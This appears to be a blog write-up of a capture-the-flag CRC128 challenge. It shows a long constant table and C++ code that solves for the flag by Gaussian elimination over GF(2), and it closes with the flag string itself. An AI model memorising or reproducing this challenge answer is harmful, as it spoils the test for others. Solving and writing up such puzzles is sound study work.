    ,0x0AA,0x23,0x0E,0x41,0x0D8,0x10,0x4E,0x0E3,0x19,0x4C,0x45,0x0FF,0x0A2,0x98,0x43,0x0B7
    ,0x3D,0x22,0x0AF,0x0AC,0x1E,0x0F6,0x0FC,0x0EC,0x9F,0x2A,0x1E,0x53,0x0D4,0x3E,0x54,0x55
    ,0x0AC,0x8D,0x2E,0x0A6,0x2,0x5E,0x0DD,0x89,0x36,0x5E,0x0C1,0x1F,0x0C4,0x2,0x21,0x47
    ,0x3B,0x8C,0x8F,0x4B,0x0C4,0x0B8,0x6F,0x86,0x0B0,0x38,0x9A,0x0B3,0x0B2,0x0A4,0x36,0x0A5
    ,0x71,0x27,0x97,0x84,0x11,0x18,0x12,0x5B,0x78,0x8F,0x96,0x5D,0x10,0x0D1,0x25,0x0E8
    ,0x0E6,0x26,0x36,0x69,0x0D7,0x0FE,0x0A0,0x54,0x0FE,0x0E9,0x0CD,0x0F1,0x66,0x77,0x32,0x0A
    ,0x0E5,0x71,0x0A6,0x1A,0x0BA,0x59,0x0E9,0x0E1,0x0E9,0x0E0,0x8F,0x81,0x55,0x3A,0x3,0x72
    ,0x72,0x70,0x7,0x0F7,0x7C,0x0BF,0x5B,0x0EE,0x6F,0x86,0x0D4,0x2D,0x23,0x9C,0x14,0x90
    ,0x38,0x0DB,0x1F,0x38,0x0A9,0x1F,0x26,0x33,0x0A7,0x31,0x0D8,0x0C3,0x81,0x0E9,0x7,0x0DD
    ,0x0AF,0x0DA,0x0BE,0x0D5,0x6F,0x0F9,0x94,0x3C,0x21,0x57,0x83,0x6F,0x0F7,0x4F,0x10,0x3F
    ,0x1A,0x84,0x1C,0x2D,0x91,0x4F,0x65,0x0F9,0x0F5,0x0D8,0x66,0x5A,0x0A1,0x91,0x0ED,0x0F9
    ,0x8D,0x85,0x0BD,0x0C0,0x57,0x0A9,0x0D7,0x0F6,0x73,0x0BE,0x3D,0x0F6,0x0D7,0x37,0x0FA,0x1B
    ,0x0C7,0x2E,0x0A5,0x0F,0x82,0x9,0x0AA,0x2B,0x0BB,0x9,0x31,0x18,0x75,0x42,0x0E9,0x56
    ,0x50,0x2F,0x4,0x0E2,0x44,0x0EF,0x18,0x24,0x3D,0x6F,0x6A,0x0B4,0x3,0x0E4,0x0FE,0x0B4
    ,0x53,0x78,0x94,0x91,0x29,0x48,0x51,0x91,0x2A,0x66,0x28,0x0C4,0x30,0x0A9,0x0CF,0x0CC
    ,0x0C4,0x79,0x35,0x7C,0x0EF,0x0AE,0x0E3,0x9E,0x0AC,0x0,0x73,0x68,0x46,0x0F,0x0D8,0x2E
    ,0x8E,0x0D2,0x2D,0x0B3,0x3A,0x0E,0x9E,0x43,0x64,0x0B7,0x7F,0x86,0x0E4,0x7A,0x0CB,0x63
    ,0x19,0x0D3,0x8C,0x5E,0x0FC,0x0E8,0x2C,0x4C,0x0E2,0x0D1,0x24,0x2A,0x92,0x0DC,0x0DC,0x81
    ,0x88,0x7C,0x0D,0x54,0x0E0,0x40,0x0D,0x29,0x4B,0x0A5,0x0FB,0x66,0x82,0x0E0,0x0A9,0x93
    ,0x1F,0x7D,0x0AC,0x0B9,0x26,0x0A6,0x0BF,0x26,0x0CD,0x0C3,0x0A0,0x0CA,0x0F4,0x46,0x0BE,0x71
    ,0x55,0x0D6,0x0B4,0x76,0x0F3,0x6,0x0C2,0x0FB,0x5,0x74,0x0AC,0x24,0x56,0x33,0x0AD,0x3C
    ,0x0C2,0x0D7,0x15,0x9B,0x35,0x0E0,0x70,0x0F4,0x83,0x12,0x0F7,0x88,0x20,0x95,0x0BA,0x0DE
    ,0x0C1,0x80,0x85,0x0E8,0x58,0x47,0x39,0x41,0x94,0x1B,0x0B5,0x0F8,0x13,0x0D8,0x8B,0x0A6
    ,0x56,0x81,0x24,0x5,0x9E,0x0A1,0x8B,0x4E,0x12,0x7D,0x0EE,0x54,0x65,0x7E,0x9C,0x44
    ,0x1C,0x2A,0x3C,0x0CA,0x4B,0x1,0x0F6,0x93,0x0DA,0x0CA,0x0E2,0x0BA,0x0C7,0x0B,0x8F,0x9
    ,0x8B,0x2B,0x9D,0x27,0x8D,0x0E7,0x44,0x9C,0x5C,0x0AC,0x0B9,0x16,0x0B1,0x0AD,0x98,0x0EB
    ,0x0F9,0x0D4,0x0FD,0x7C,0x0CF,0x45,0x0D5,0x66,0x21,0x8E,0x70,0x8D,0x9C,0x0CF,0x95,0x0B5
    ,0x6E,0x0D5,0x5C,0x91,0x9,0x0A3,0x67,0x69,0x0A7,0x0E8,0x2B,0x21,0x0EA,0x69,0x82,0x57
    ,0x24,0x7E,0x44,0x5E,0x0DC,0x3,0x1A,0x0B4,0x6F,0x5F,0x27,0x0CF,0x48,0x1C,0x91,0x1A
    ,0x0B3,0x7F,0x0E5,0x0B3,0x1A,0x0E5,0x0A8,0x0BB,0x0E9,0x39,0x7C,0x63,0x3E,0x0BA,0x86,0x0F8
    ,0x0B0,0x28,0x75,0x0C0,0x77,0x42,0x0E1,0x0E,0x0FE,0x30,0x3E,0x13,0x0D,0x0F7,0x0B7,0x80
    ,0x27,0x29,0x0D4,0x2D,0x0B1,0x0A4,0x53,0x1,0x78,0x56,0x65,0x0BF,0x7B,0x51,0x0A0,0x62
    ,0x6D,0x82,0x0CC,0x0E2,0x64,0x4,0x2E,0x0DC,0x0B0,0x0E1,0x69,0x51,0x0D9,0x24,0x0B3,0x2F
    ,0x0FA,0x83,0x6D,0x0F,0x0A2,0x0E2,0x9C,0x0D3,0x36,0x87,0x32,0x0FD,0x0AF,0x82,0x0A4,0x0CD
    ,0x6B,0x2C,0x0EC,0x5,0x0BE,0x4A,0x0BD,0x0B6,0x9F,0x0F3,0x0ED,0x0B1,0x0BF,0x0BE,0x0D1,0x0DF
    ,0x0FC,0x2D,0x4D,0x0E8,0x78,0x0AC,0x0F,0x0B9,0x19,0x95,0x0B6,0x1D,0x0C9,0x18,0x0C6,0x3D
    ,0x0B6,0x86,0x55,0x27,0x0AD,0x0C,0x72,0x64,0x0D1,0x22,0x0BA,0x0F3,0x6B,0x6D,0x0D5,0x70
    ,0x21,0x87,0x0F4,0x0CA,0x6B,0x0EA,0x0C0,0x6B,0x57,0x44,0x0E1,0x5F,0x1D,0x0CB,0x0C2,0x92
    ,0x22,0x0D0,0x64,0x0B9,0x6,0x4D,0x89,0x0DE,0x40,0x4D,0x0A3,0x2F,0x2E,0x86,0x0F3,0x0EA
    ,0x0B5,0x0D1,0x0C5,0x54,0x0C0,0x0AB,0x3B,0x0D1,0x0C6,0x2B,0x0F8,0x83,0x58,0x20,0x0E4,0x8
    ,0x0FF,0x7A,0x0DD,0x9B,0x15,0x0B,0x46,0x0C,0x0E,0x9C,0x0F4,0x6D,0x0FA,0x55,0x0F7,0x45
    ,0x68,0x7B,0x7C,0x76,0x0D3,0x0ED,0x0F4,0x3,0x88,0x0FA,0x0AF,0x0C1,0x8C,0x0F3,0x0E0,0x0A7
    ,0x0DD,0x25,0x0DE,0x8E,0x2D,0x5B,0x5,0x0C6,0x5C,0x75,0x4A,0x0F4,0x0DA,0x2D,0x1D,0x61
    ,0x4A,0x24,0x7F,0x63,0x0EB,0x0BD,0x0B7,0x0C9,0x0DA,0x13,0x11,0x58,0x0AC,0x8B,0x0A,0x83
    ,0x0,0x8F,0x67,0x0AC,0x3E,0x1D,0x0CA,0x14,0x12,0x0A4,0x1D,0x0B6,0x0E,0x0FE,0x19,0x0CE
    ,0x97,0x8E,0x0C6,0x41,0x0F8,0x0FB,0x78,0x1B,0x94,0x0C2,0x46,0x1A,0x78,0x58,0x0E,0x2C
    ,0x94,0x0D9,0x56,0x32,0x95,0x5C,0x31,0x0AE,0x83,0x0CB,0x4,0x6A,0x4B,0x15,0x3F,0x54
    ,0x3,0x0D8,0x0F7,0x0DF,0x53,0x0BA,0x83,0x0A1,0x5,0x0AD,0x5F,0x0C6,0x3D,0x0B3,0x28,0x0B6
    ,0x49,0x73,0x0EF,0x10,0x86,0x1A,0x0FE,0x7C,0x0CD,0x1A,0x53,0x28,0x9F,0x0C6,0x3B,0x0FB
    ,0x0DE,0x72,0x4E,0x0FD,0x40,0x0FC,0x4C,0x73,0x4B,0x7C,0x8,0x84,0x0E9,0x60,0x2C,0x19
    ,0x4F,0x0DD,0x0CF,0x0F7,0x5C,0x54,0x6D,0x16,0x0E2,0x8,0x0D7,0x0C8,0x0F9,0x5C,0x59,0x0B
    ,0x0D8,0x0DC,0x6E,0x1A,0x9A,0x0B2,0x0DF,0x19,0x64,0x6E,0x8C,0x64,0x8F,0x0FA,0x4E,0x0E9
    ,0x92,0x77,0x76,0x0D5,0x4F,0x12,0x0A2,0x0C4,0x0AC,0x0D9,0x80,0x8A,0x2D,0x8F,0x5D,0x0A4
    ,0x5,0x76,0x0D7,0x38,0x89,0x0F4,0x10,0x0CB,0x2A,0x0BF,0x0DB,0x26,0x5B,0x29,0x4A,0x46
    ,0x6,0x21,0x47,0x4B,0x0E4,0x53,0x59,0x7E,0x3D,0x0B6,0x99,0x56,0x68,0x64,0x7B,0x3E
    ,0x91,0x20,0x0E6,0x0A6,0x22,0x0B5,0x0EB,0x71,0x0BB,0x0D0,0x0C2,0x0FA,0x1E,0x0C2,0x6C,0x0DC
    ,0x0DB,0x8B,0x0FE,0x69,0x0F7,0x15,0x96,0x0AC,0x73,0x67,0x0CE,0x14,0x0BC,0x0B7,0x7F,0x91
    ,0x4C,0x8A,0x5F,0x84,0x31,0x0F3,0x24,0x0A3,0x0F5,0x1,0x95,0x0B8,0x0CA,0x11,0x68,0x73
    ,0x42,0x9F,0x41,0x61,0x94,0x0F3,0x0DF,0x0EA,0x98,0x64,0x0E4,0x65,0x29,0x94,0x0AF,0x77
    ,0x0D5,0x9E,0x0E0,0x8C,0x52,0x15,0x6D,0x0E5,0x1E,0x2,0x0BF,0x0C9,0x5F,0x32,0x0B8,0x95
    ,0x9F,0x35,0x0F8,0x43,0x87,0x0B5,0x10,0x38,0x0D6,0x0B5,0x0B3,0x27,0x0FD,0x47,0x0AB,0x0D8
    ,0x8,0x34,0x59,0x0AE,0x41,0x53,0x0A2,0x37,0x50,0x0D3,0x0E8,0x8B,0x8B,0x0E1,0x0BC,0x3A
    ,0x0B,0x63,0x0C9,0x0DD,0x2C,0x0F4,0x0EB,0x82,0x47,0x0DA,0x0AA,0x0FB,0x0B8,0x0AC,0x8D,0x42
    ,0x9C,0x62,0x68,0x30,0x0EA,0x12,0x59,0x8D,0x0C1,0x0BC,0x0F1,0x57,0x0CE,0x0A,0x9A,0x0A0
    ,0x0D6,0x0C9,0x70,0x0FF,0x3F,0x0B2,0x24,0x50,0x9,0x0B,0x0FD,0x0B9,0x6C,0x7F,0x89,0x0ED
    ,0x41,0x0C8,0x0D1,0x12,0x0F9,0x54,0x96,0x5F,0x8F,0x6D,0x0A6,0x15,0x1A,0x0D9,0x9E,0x0F
    ,0x0D0,0x67,0x50,0x18,0x0E5,0x0FC,0x0B7,0x3A,0x26,0x19,0x79,0x59,0x0A,0x0E5,0x0EB,0x1D
    ,0x47,0x66,0x0F1,0x0F5,0x23,0x1A,0x5,0x35,0x0A0,0x7F,0x22,0x0F5,0x7C,0x43,0x0FC,0x0FF
    ,0x0D,0x0CD,0x0E9,0x3A,0x0F6,0x0BA,0x78,0x0E8,0x68,0x0C8,0x2E,0x1B,0x0DE,0x36,0x0EF,0x0B2
    ,0x9A,0x0CC,0x48,0x0D7,0x30,0x5C,0x0CA,0x0E7,0x0EE,0x0AE,0x75,0x0B7,0x0A8,0x90,0x0F8,0x50
    ,0x99,0x9B,0x0D8,0x0A4,0x5D,0x0FB,0x83,0x52,0x0F9,0x0A7,0x37,0x0C7,0x9B,0x0DD,0x0C9,0x28
    ,0x0E,0x9A,0x79,0x49,0x9B,0x1D,0x31,0x5D,0x7F,0x0C1,0x6C,0x6B,0x0ED,0x7B,0x0DE,0x0CA
    ,0x44,0x31,0x61,0x86,0x4E,0x0BD,0x4C,0x80,0x0B7,0x76,0x60,0x85,0x4F,0x0E,0x0CD,0x87
    ,0x0D3,0x30,0x0C0,0x6B,0x88,0x5B,0x0FE,0x8F,0x31,0x10,0x3B,0x29,0x39,0x0A8,0x0DA,0x65
    ,0x66,0x6E,0x62,0x93,0x76,0x0ED,0x0F,0x4A,0x0E5,0x9F,0x0DE,0x1C,0x6F,0x76,0x27,0x0A3
    ,0x0F1,0x6F,0x0C3,0x7E,0x0B0,0x0B,0x0BD,0x45,0x63,0x0F9,0x85,0x0B0,0x19,0x0D0,0x30,0x41
    ,0x0BB,0x0C4,0x0DB,0x0B1,0x65,0x0AB,0x0C0,0x98,0x0AB,0x4E,0x89,0x5E,0x0BB,0x0A5,0x23,0x0C
    ,0x2C,0x0C5,0x7A,0x5C,0x0A3,0x4D,0x72,0x97,0x2D,0x28,0x0D2,0x0F2,0x0CD,0x3,0x34,0x0EE
    ,0x2F,0x92,0x0EA,0x2F,0x0CE,0x0EA,0x3B,0x22,0x3A,0x21,0x90,0x82,0x0FE,0x4E,0x5,0x96
    ,0x0B8,0x93,0x4B,0x0C2,0x8,0x0C,0x89,0x2D,0x0BC,0x47,0x0CB,0x2E,0x88,0x0E8,0x12,0x74
    ,0x0F2,0x38,0x53,0x0D,0x0DD,0x0AC,0x0F4,0x0F0,0x74,0x0F0,0x0C7,0x0C0,0x2A,0x9D,0x1,0x39
    ,0x65,0x39,0x0F2,0x0E0,0x1B,0x4A,0x46,0x0FF,0x0F2,0x96,0x9C,0x6C,0x5C,0x3B,0x16,0x0DB
    ,0x0F4,0x96,0x73,0x0EA,0x7,0x0E2,0x67,0x9A,0x5B,0x0E2,0x43,0x20,0x4C,0x7,0x63,0x0C9
    ,0x63,0x97,0x0D2,0x7,0x0C1,0x4,0x0D5,0x95,0x0DD,0x84,0x18,0x8C,0x3A,0x0A1,0x74,0x2B
    ,0x29,0x3C,0x0CA,0x0C8,0x14,0x0A4,0x0A8,0x48,0x15,0x33,0x14,0x62,0x98,0x0D4,0x67,0x66
    ,0x0BE,0x3D,0x6B,0x25,0x0D2,0x42,0x1A,0x47,0x93,0x55,0x4F,0x0CE,0x0EE,0x72,0x70,0x84
    ,0x0BD,0x6A,0x0FB,0x56,0x0BF,0x0E5,0x53,0x0F2,0x84,0x5C,0x0D,0x0BE,0x0DD,0x3F,0x41,0x0FC
    ,0x2A,0x6B,0x5A,0x0BB,0x79,0x3,0x0E1,0x0FD,0x2,0x3A,0x56,0x12,0x0AB,0x99,0x56,0x1E
    ,0x60,0x0C0,0x42,0x74,0x0AC,0x0A3,0x9C,0x20,0x0CA,0x8D,0x5A,0x0FC,0x9,0x0EC,0x45,0x53
    ,0x0F7,0x0C1,0x0E3,0x99,0x6A,0x45,0x2E,0x2F,0x4C,0x0EB,0x1,0x50,0x7F,0x4A,0x52,0x0B1
    ,0x7C,0x0EA,0x7E,0x0BE,0x0E7,0x0A2,0x6A,0x0B3,0x10,0x47,0x0B8,0x46,0x0CE,0x0E7,0x0CA,0x5A
    ,0x0EB,0x0EB,0x0DF,0x53,0x21,0x44,0x0D8,0x0BC,0x96,0x21,0x0E3,0x0EA,0x0B8,0x41,0x0DD,0x0B8
    ,0x0A1,0x40,0x0C7,0x9C,0x0F4,0x0E4,0x0A5,0x61,0x5E,0x96,0x0EF,0x4,0x1A,0x34,0x0CE,0x0F5
    ,0x36,0x41,0x66,0x71,0x32,0x2,0x17,0x6E,0x0D8,0x0F0,0x0B4,0x0A8,0x6C,0x92,0x0D9,0x17
    ,0x35,0x16,0x0F6,0x2,0x5F,0x0A5,0x5E,0x0DB,0x0CF,0x0F9,0x0F6,0x0D8,0x5F,0x0DF,0x0E8,0x6F
    ,0x0A2,0x17,0x57,0x0EF,0x99,0x43,0x0EC,0x0D4,0x49,0x9F,0x0AD,0x74,0x29,0x79,0x0FF,0x8D
    ,0x0E8,0x0BC,0x4F,0x20,0x4C,0x0E3,0x91,0x9,0x81,0x28,0x0A1,0x9A,0x8B,0x0C,0x0EC,0x0C0
    ,0x7F,0x0BD,0x0EE,0x0CD,0x8A,0x5,0x23,0x6,0x7,0x4E,0x0FA,0x36,0x0FD,0x0AA,0x0FB,0x22
    ,0x0EE,0x12,0x6F,0x0C7,0x96,0x0AD,0x2,0x63,0x0AE,0x3A,0x25,0x7A,0x0ED,0x96,0x8E,0x30
    ,0x79,0x13,0x0CE,0x2A,0x50,0x4B,0x0B0,0x6C,0x28,0x5C,0x7E,0x0D6,0x9B,0x30,0x99,0x0D2
    ,0x33,0x0B8,0x0D6,0x0E5,0x85,0x0EB,0x0CD,0x0B1,0x0E0,0x0EB,0x72,0x38,0x39,0x45,0x8A,0x9F
    ,0x0A4,0x0B9,0x77,0x8,0x43,0x0D,0x7F,0x0BE,0x66,0x8D,0x29,0x94,0x4F,0x0E3,0x9D,0x7D
    ,0x0A7,0x0EE,0x0E7,0x7B,0x2E,0x0AA,0x36,0x0B,0x71,0x84,0x6B,0x0E4,0x7C,0x0AE,0x0AC,0x5
    ,0x30,0x0EF,0x46,0x96,0x0E8,0x4C,0x84,0x4,0x0F7,0x0E2,0x30,0x48,0x0A,0x8,0x0BB,0x0E7
    ,0x7A,0x44,0x5E,0x59,0x3D,0x0EC,0x0F9,0x0D9,0x3F,0x55,0x3C,0x0A6,0x0A8,0x7D,0x0A8,0x0AA
    ,0x0ED,0x45,0x0FF,0x0B4,0x0FB,0x0A,0x4B,0x0D6,0x0B9,0x33,0x67,0x0A,0x0DE,0x0DB,0x0BF,0x48
    ,0x58,0x1B,0x5D,0x4C,0x5,0x0BC,0x0BA,0x13,0x6D,0x0BC,0x82,0x3F,0x88,0x5,0x42,0x8E
    ,0x0CF,0x1A,0x0FC,0x0A1,0x0C3,0x5A,0x8,0x1C,0x0EB,0x0DA,0x0D9,0x93,0x0FE,0x0A3,0x55,0x6C
    ,0x85,0x0B1,0x0E4,0x6E,0x16,0x0FA,0x75,0x0C1,0x23,0x6D,0x0D5,0x7D,0x5C,0x0D6,0x46,0x21
    ,0x12,0x0B0,0x45,0x83,0x0D0,0x1C,0x0C7,0x0CE,0x0A5,0x0B,0x8E,0x0D1,0x2A,0x70,0x51,0x0C3
    ,0x11,0x0E7,0x0D5,0x0F0,0x0BD,0x0BB,0x8E,0x7B,0x0B2,0x2,0x0CC,0x0A1,0x19,0x3D,0x60,0x0BB
    ,0x86,0x0E6,0x74,0x1D,0x7B,0x5D,0x3C,0x74,0x34,0x64,0x97,0x0D,0x6F,0x9B,0x77,0x59
    ,0x0CC,0x4D,0x6C,0x0D2,0x0AE,0x0FD,0x41,0x0A9,0x0FC,0x0D3,0x9B,0x0E3,0x0CD,0x0EE,0x64,0x14
    ,0x5B,0x4C,0x0CD,0x3F,0x68,0x1B,0x0F3,0x0A6,0x7A,0x0B5,0x0C0,0x4F,0x0BB,0x48,0x73,0x0F6
    ,0x0CA,0x0E3,0x4C,0x35,0x74,0x0B3,0x0D2,0x0C3,0x0D3,0x0C1,0x1F,0x3,0x0AB,0x74,0x6,0x0E4
    ,0x5D,0x0E2,0x0ED,0x0D8,0x0B2,0x55,0x60,0x0CC,0x55,0x0A7,0x44,0x0AF,0x0DD,0x0D2,0x11,0x6
    ,0x17,0x49,0x0F5,0x17,0x67,0x0F5,0x1D,0x11,0x9D,0x10,0x48,0x41,0x7F,0x0A7,0x2,0x4B
    ,0x80,0x48,0x54,0x0FA,0x0A1,0x13,0x0AF,0x1E,0x1B,0x76,0x13,0x0ED,0x9,0x1,0x15,0x0A9
    ,0x83,0x1F,0x0C4,0x89,0x0CC,0x0B4,0x0E6,0x0AB,0x0C,0x7F,0x51,0x9D,0x3A,0x4C,0x24,0x0D1
    ,0x14,0x1E,0x65,0x64,0x0A,0x52,0x54,0x0A4,0x8A,0x19,0x0A,0x31,0x4C,0x0EA,0x33,0x33
    ,0x5E,0x0B5,0x7D,0x0AB,0x0DF,0x0F2,0x29,0x79,0x42,0x0AE,0x6,0x0DF,0x0EE,0x9F,0x20,0x7E
    ,0x0C9,0x0B4,0x0DC,0x46,0x19,0x14,0x9B,0x76,0x0C4,0x0C8,0x5D,0x73,0x98,0x39,0x37,0x9C
    ,0x0C7,0x0A1,0x0C2,0x0A3,0x0BC,0x14,0x60,0x3F,0x0A9,0x0AD,0x2C,0x0AE,0x7B,0x0BC,0x0F0,0x98
    ,0x50,0x0A0,0x63,0x4E,0x7A,0x0F2,0x0D2,0x30,0x2F,0x0CB,0x77,0x2,0x0D,0x1A,0x0E7,0x7A
    ,0x1A,0x0B,0x7B,0x81,0x0AF,0x52,0x0AF,0x0ED,0x0E7,0x7C,0x7B,0x0EC,0x0AF,0x6F,0x0F4,0x37
    ,0x8D,0x0A,0x0DA,0x6C,0x69,0x0B4,0x1D,0x0E2,0x61,0x1A,0x20,0x40,0x0D9,0x0C9,0x0E3,0x0D5
    ,0x8E,0x5D,0x4A,0x1F,0x4,0x13,0x54,0x57,0x76,0x13,0x62,0x30,0x0EA,0x84,0x0D2,0x0AD
    ,0x19,0x5C,0x0EB,0x0F2,0x0C2,0x0F5,0x0E6,0x58,0x0F0,0x75,0x39,0x9C,0x9C,0x22,0x0C5,0x4F
    ,0x53,0x0F7,0x0F3,0x3D,0x17,0x55,0x9B,0x85,0x38,0x0C2,0x35,0x72,0x3E,0x57,0x0D6,0x2
    ,0x0C4,0x0F6,0x52,0x0D0,0x0D1,0x0B3,0x29,0x8A,0x0BE,0x0A4,0x6E,0x0DE,0x48,0x0F1,0x0C1,0x0E0
    ,0x55,0x59,0x0D3,0x0DA,0x0CD,0x1B,0x8,0x0EF,0x17,0x0D0,0x0B1,0x92,0x58,0x0CD,0x0B4,0x0F2
    ,0x0C2,0x58,0x72,0x37,0x0B,0x0FD,0x0BA,0x0E0,0x91,0x0B6,0x0EA,0x3E,0x2E,0x6B,0x0A3,0x10
    ,0x88,0x0F3,0x6A,0x0F8,0x0DE,0x5D,0x0C7,0x3D,0x59,0x1,0x0E6,0x0D0,0x8C,0x1E,0x0B0,0x5D
    ,0x1F,0x0F2,0x0CB,0x15,0x18,0x0BB,0x75,0x32,0x0DF,0x67,0x0BD,0x7C,0x0FA,0x0B8,0x0A7,0x0BF
    ,0x1C,0x0A5,0x5B,0x66,0x75,0x1C,0x3C,0x87,0x0C8,0x6E,0x0FF,0x0C,0x0C9,0x0F5,0x96,0x0C7
    ,0x8B,0x0A4,0x0FA,0x8B,0x0B3,0x0FA,0x8E,0x88,0x4E,0x8,0x0A4,0x0A0,0x0BF,0x53,0x81,0x25
    ,0x0C1,0x0F,0x0E2,0x44,0x66,0x5A,0x0F3,0x55,0x86,0x0BF,0x0A8,0x4E,0x1D,0x26,0x92,0x68
    ,0x56,0x0E,0x43,0x0A9,0x0A0,0x0BC,0x41,0x5A,0x0,0x0D9,0x0F3,0x0E2,0x6B,0x80,0x85,0x8A
    ,0x0E3,0x50,0x0E1,0x51,0x5E,0x0A,0x0B0,0x9F,0x0D4,0x56,0x16,0x0D7,0x3D,0x5E,0x78,0x4C
    ,0x74,0x51,0x40,0x0BC,0x98,0x0EC,0x2,0x90,0x52,0x30,0x4D,0x7B,0x4B,0x0F8,0x6F,0x0AE
    ,0x3E,0x0FA,0x58,0x73,0x4D,0x4C,0x7F,0x4D,0x9A,0x87,0x41,0x95,0x0E9,0x8D,0x7C,0x0E3
    ,0x0A9,0x0FB,0x0F9,0x9E,0x8B,0x0AA,0x0CD,0x42,0x1C,0x0E1,0x1A,0x39,0x9F,0x2B,0x6B,0x1
    ,0x0AA,0x0AC,0x69,0x0ED,0x0E6,0x0D,0x84,0x0F7,0x0B,0x0E8,0x58,0x49,0x0AC,0x66,0x5A,0x79
    ,0x3D,0x0AD,0x0C8,0x0,0x20,0x0EB,0x36,0x0F8,0x8D,0x8E,0x3,0x0E5,0x0DA,0x0C0,0x4D,0x9B
    ,0x77,0x6,0x0D0,0x0CF,0x0F5,0x4B,0x4B,0x25,0x45,0x39,0x0F,0x0B,0x78,0x0B5,0x5E,0x0D6
    ,0x0E0,0x7,0x71,0x22,0x33,0x0AD,0x0F9,0x2A,0x0C3,0x5F,0x54,0x0A7,0x0E,0x13,0x49,0x34
    ,0x71,0x0A8,0x0F0,0x28,0x2F,0x5,0x0D8,0x4F,0x6A,0x2B,0x8B,0x0EB,0x1E,0x2F,0x3C,0x26
    ,0x0E6,0x0A9,0x51,0x0C5,0x0E9,0x0E3,0x6A,0x40,0x0EC,0x4D,0x0D0,0x47,0x68,0x89,0x2B,0x0C4
    ,0x0AC,0x2,0x49,0x0A,0x3C,0x43,0x17,0x9D,0x24,0x0FA,0x0DC,0x0A9,0x0CA,0x0FC,0x38,0x89
    ,0x3B,0x3,0x0E8,0x0E7,0x0FA,0x0A5,0x0A5,0x92,0x0A2,0x9C,0x87,0x5,0x0BC,0x5A,0x2F,0x6B
    ,0x38,0x54,0x78,0x94,0x97,0x2,0x0EC,0x27,0x0B5,0x95,0x0C5,0x75,0x8F,0x17,0x1E,0x13
    ,0x0AF,0x55,0x0D9,0x79,0x51,0x0E4,0x5E,0x28,0x33,0x0F3,0x9E,0x0D9,0x0F9,0x0B1,0x9,0x0F1
    ,0x0E5,0x0FE,0x0C1,0x0B6,0x84,0x44,0x23,0x0F5,0x0FB,0x44,0x92,0x37,0x5B,0x0C4,0x1A,0x0BC
    ,0x72,0x0FF,0x60,0x5B,0x42,0x0A2,0x91,0x0FA,0x7D,0x22,0x0C9,0x9B,0x2D,0x62,0x0D,0x5E };
    View Code

    上边是计算CRC128时用到的常量表,因为太长了所以单独取出来折叠一下,核心求解代码在下边

    #define _CRT_SECURE_NO_WARNINGS
    #include <cstdio>
    #include <cstdlib>
    #include <string>
    #include <iostream>
    using namespace std;
    unsigned char xcode[16];
    unsigned char input[] = "cnss{\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0}";
    string flip[128];
    string crc[128];
    string inputstr[128];
    string noflip;
    char buf[30];
    char buf2[30];
    
    int a[128][128+1],n=128,ans[128];
    int table[128*128];
    int noflipbin[128];
    int mktable()
    {
        //printf("%d\n", sizeof(key));
        for (int i = 0; i < 16; i++) input[5 + i] = 0x00;
        for (int i = 0; i < 16; i++) xcode[i] = 0xFF;
        for (int i = 0; i < 22; i++)
        {
            int idx = input[i] ^ xcode[0];
            for (int j = 0; j < 15; j++) xcode[j] = xcode[j + 1];
            xcode[15] = 0;
            for (int j = 0; j < 16; j++) xcode[j] ^= key[idx * 16 + j];
        }
        for (int i = 0; i < 16; i++)
        {
            _itoa(xcode[i], buf, 2);
            sprintf(buf2, "%08s", buf);
            noflip += buf2;
        }
        for (int i=0;i<128;i++) noflipbin[i]=noflip[i]-'0';
        cout << noflip << endl;
        for (int f=0;f<128;f++)
        {
            int cnt = f;
            for (int i = 0; i < 16; i++)
            {
                unsigned int bt=0;
                for (int j = 0; j < 8; j++) { bt = (bt << 1) + (cnt == 0 ? 1 : 0); cnt--; }
                input[5 + i] = bt;
            }
            inputstr[f] = "";
            for (int i = 0; i < 16; i++)
            {
                _itoa(input[5 + i], buf, 2);
                sprintf(buf2, "%08s", buf);
                inputstr[f] += buf2;
            }
            for (int i = 0; i < 16; i++) xcode[i] = 0xFF;
            for (int i = 0; i < 22; i++)
            {
                int idx = input[i] ^ xcode[0];
                for (int j = 0; j < 15; j++) xcode[j] = xcode[j + 1];
                xcode[15] = 0;
                for (int j = 0; j < 16; j++) xcode[j] ^= key[idx * 16 + j];
            }
            for (int i = 0; i < 16; i++)
            {
                _itoa(xcode[i], buf, 2);
                sprintf(buf2,"%08s", buf);
                crc[f] += buf2;
            }
            for (int i = 0; i < 128; i++)
            {
                flip[f] += (((crc[f][i] == noflip[i]) ? '0' : '1') == inputstr[f][i]) ? "0" : "1";
                table[f*128+i] = (((crc[f][i] == noflip[i]) ? '0' : '1') == inputstr[f][i]) ? 0 : 1;
            }
            cout << flip[f] << endl;
        }
    }
    void gauss()
    {
        for(int i=0;i<n;i++)
        {
            int j=i;
            while(j<n&&!a[j][i])j++;
            if(j>=n)continue;
            if(i!=j)for(int k=0;k<n+1;k++)swap(a[i][k],a[j][k]);
            for(int j=0;j<n;j++)
                if(i!=j&&a[j][i])
                    for(int k=0;k<n+1;k++)
                        a[j][k]^=a[i][k];
        }
    }
    void dfs(int now)
    {
        if(now<0)
        {
            printf("cnss{");
            for (int i=0;i<16;i++)
            {
                int t=0;
                for (int j=0;j<8;j++)
                    t=t*2+ans[i*8+j];
                printf("%02x",t);
            }
            printf("}");
            printf("\n");
            for (int i=0;i<n;i++) printf("%d,",ans[i]);
            printf("\n");
            return;
        }
        if(a[now][now])
        {
            int t=a[now][n];
            for(int i=now+1;i<n;i++)
                if(a[now][i]) t^=ans[i];
            ans[now]=t;
            dfs(now-1);
        }
        else
        {
            ans[now]=1;dfs(now-1);
            ans[now]=0;dfs(now-1);
        }
    }
    int xorsolve()
    {
        for (int i=0;i<n;i++)
        {
            for (int j=0;j<n;j++) a[i][j]=table[128*j+i];
            a[i][n]=noflipbin[i];
        }
        gauss();
        for(int i=0;i<n;i++)
        {
            for(int j=0;j<n+1;j++)
                printf("%d ",a[i][j]);
            printf("\n");
        }
        dfs(n-1);
    }
    int main()
    {
        mktable();
        xorsolve();
    }
    //cnss{39e77cc4d9a23eed051bb30029bff4f0}

     

  • 相关阅读:
    JDBC操作数据库的步骤 ?
    switch 是否能作用在 byte 上,是否能作用在 long 上, 是否能作用在 String 上?
    有哪些不同类型的IOC(依赖注入)方式?
    ApplicationContext通常的实现是什么?
    如何给Spring 容器提供配置元数据?
    一个”.java”源文件中是否可以包含多个类(不是内部类)? 有什么限制?
    数据库连接(Database link)?
    你怎样定义类的作用域?
    JSP的常用指令有哪些?
    Mapper 编写有哪几种方式?
